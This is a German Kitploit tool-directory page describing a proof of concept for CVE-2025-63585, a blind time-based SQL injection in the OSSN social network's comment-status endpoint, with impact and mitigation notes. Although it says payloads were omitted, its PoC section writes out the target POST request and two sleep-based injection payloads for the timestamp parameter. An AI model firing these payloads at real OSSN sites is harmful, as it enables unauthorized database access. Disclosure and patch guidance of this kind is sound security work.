Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-63585 — Proof-of-concept für eine blinde zeitbasierte SQL-Injection-Schwachstelle im /action/rtcomments/status-Endpunkt von OSSN, die die willkürliche SQL-Ausführung über den Parameter timestamp demonstriert. | Kitploit
Tools/GitHubGitHub/kgan0509/cve-2025-63585
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsDatenbanksicherheit
GitHubkgan0509/cve-2025-63585

CVE-2025-63585

Proof-of-concept für eine blinde zeitbasierte SQL-Injection-Schwachstelle im /action/rtcomments/status-Endpunkt von OSSN, die die willkürliche SQL-Ausführung über den Parameter timestamp demonstriert.

Repository anzeigen
2vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-63585

Blinde zeitbasierte SQL-Injection in /action/rtcomments/status (Parameter: timestamp)

Eine blinde, zeitbasierte SQL-Injection-Schwachstelle wurde im timestamp-Parameter des Endpunkts /action/rtcomments/status gefunden. Ein authentifizierter Angreifer, der diesen Parameter bereitstellen kann, könnte möglicherweise beliebige SQL-Abfragen ausführen und dadurch sensible Daten offenlegen oder ändern.

Auswirkungen: Datenoffenlegung, Datenänderung, Rechteausweitung, mögliche Denial-of-Service (DoS) durch zeitverzögerte Abfragen (abhängig von Datenbankberechtigungen).

Mitigation: Aktualisieren Sie OSSN auf Version 8.9 oder höher. Stellen Sie zusätzlich sicher, dass die Anwendung parametrisierte Abfragen/vorbereitete Anweisungen für den gesamten Datenbankzugriff verwendet, validieren Sie die timestamp-Eingabe strikt (akzeptieren Sie nur erwartete numerische oder ISO-Formate), setzen Sie das Least-Privilege-Prinzip für das Datenbankkonto durch und aktivieren Sie Abfrage-Timeouts und Protokollierung.

Hinweise: Exploit-Payloads wurden aus Sicherheitsgründen absichtlich weggelassen.

github: https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2503

PoC

Senden Sie eine Anfrage mit der Methode POST '/action/rtcomments/status?guid=18&type=post&ossn_ts=1759741100&ossn_token=c3901a321e755ea3e9956e79eb0fbc7e674f80665725774738b93324699c7c28'

Payload: timestamp=(select*from(select(sleep(10)))a) Bild

Payload: timestamp=(select*from(select(sleep(30)))a) Bild

Tool herunterladen